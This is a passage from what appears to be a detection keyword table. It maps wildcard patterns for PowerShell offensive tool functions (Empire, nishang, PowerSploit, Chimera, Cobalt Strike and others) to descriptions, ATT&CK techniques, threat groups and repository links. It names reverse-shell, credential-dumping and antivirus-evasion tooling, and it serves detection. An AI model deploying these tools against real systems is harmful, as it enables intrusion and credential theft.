Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1142","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PowerDump*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-PowerDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
+"*Invoke-PowerShellHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-PowerShellIcmp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PowerShellIcmp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"*Invoke-PowerShellTcp*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-PowerShellTcp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PowerShellTcp.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-PowerShellTcp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"*Invoke-PowerShellTcpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PowerShellTcpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"*Invoke-PowerShellTcpOneLineBind*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PowershellTranscriptionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-PowerShellUdp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PowerShellUdp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"*Invoke-PowerShellUdpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PowerShellUdpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"*Invoke-PowerShellWmi*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PowerThIEf*","offensive_tool_keyword","Invoke-PowerThIEf","An IE Post Exploitation Library released at Steelcon in Sheffield 7th July 2018.","T1027 - T1053 - T1114 - T1059 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/nettitude/Invoke-PowerThIEf","1","0","N/A","N/A","2","127","27","2018-09-12T11:26:06Z","2018-07-10T09:14:58Z"
+"*Invoke-PPLDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Prasadhak*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PrintDemon*","offensive_tool_keyword","Invoke-PrintDemon","This is an PowerShell Empire launcher PoC using PrintDemon and Faxhell. The module has the Faxhell DLL already embedded which leverages CVE-2020-1048 for privilege escalation. 
The vulnerability allows an unprivileged user to gain system-level privileges and is based on @ionescu007 PoC.","T1204 - T1208 - T1216 - T1055 - T1203","TA0001 - TA0007 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-PrintDemon","1","1","N/A","N/A","2","193","41","2020-10-17T17:04:24Z","2020-05-15T05:14:49Z"
+"*Invoke-PrintNightmareCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-Privesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-PrivescAudit*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Invoke-PrivescCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-PrivescCheck.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*invokeprocesshunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 
- T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*Invoke-ProcessHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*Invoke-ProcessHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*invoke-processhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z"
+"*Invoke-ProcessScan*","offensive_tool_keyword","Invoke-ProcessScan","This script uses a list from the Equation Group leak from the shadow brokers to provide context to executeables that are running on a system.","T1059.001 - T1016 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/vysecurity/Invoke-ProcessScan","1","1","N/A","N/A","1","42","22","2017-06-05T12:19:25Z","2017-06-03T18:36:30Z"
+"*InvokePS1.bat*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*Invoke-ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation 
tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z"
+"*Invoke-PSAmsiScan*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z"
+"*Invoke-PsExec*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-PSexec.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-PsExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*invoke-psexecpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Invoke-PsGcat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PsGcatAgent*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-PSImage*","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.","T1027 - T1218 - T1216 - T1059","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","0","N/A","N/A","10","2075","401","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z"
+"*Invoke-PSInject*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-PSInject.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
